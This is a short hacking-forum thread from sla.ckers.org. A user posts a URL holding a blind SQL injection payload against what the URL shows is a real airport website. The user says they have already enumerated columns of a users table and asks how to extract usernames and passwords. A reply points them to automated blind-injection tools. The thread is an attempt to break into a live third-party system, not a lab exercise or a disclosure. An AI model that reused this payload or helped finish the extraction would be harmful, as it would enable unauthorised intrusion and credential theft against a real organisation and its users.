Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how can i find user and passw!!!!?
Posted by: tascio
Date: November 13, 2013 11:07AM

this is the blind injection
http://www.aeroporto.catania.it/page.php?cPath=9999%20and%20%28select%20substring%28concat%281,id%29,1,1%29%20from%20users%20limit%200,1%29=1

i just found id, name and active.
username and password :((

Options: ReplyQuote
Re: how can i find user and passw!!!!?
Posted by: firestorm
Date: November 13, 2013 01:17PM

try some tool.. there was a fast blind injection tool in some conference.. google it.

Options: ReplyQuote


Sorry, only registered users may post in this forum.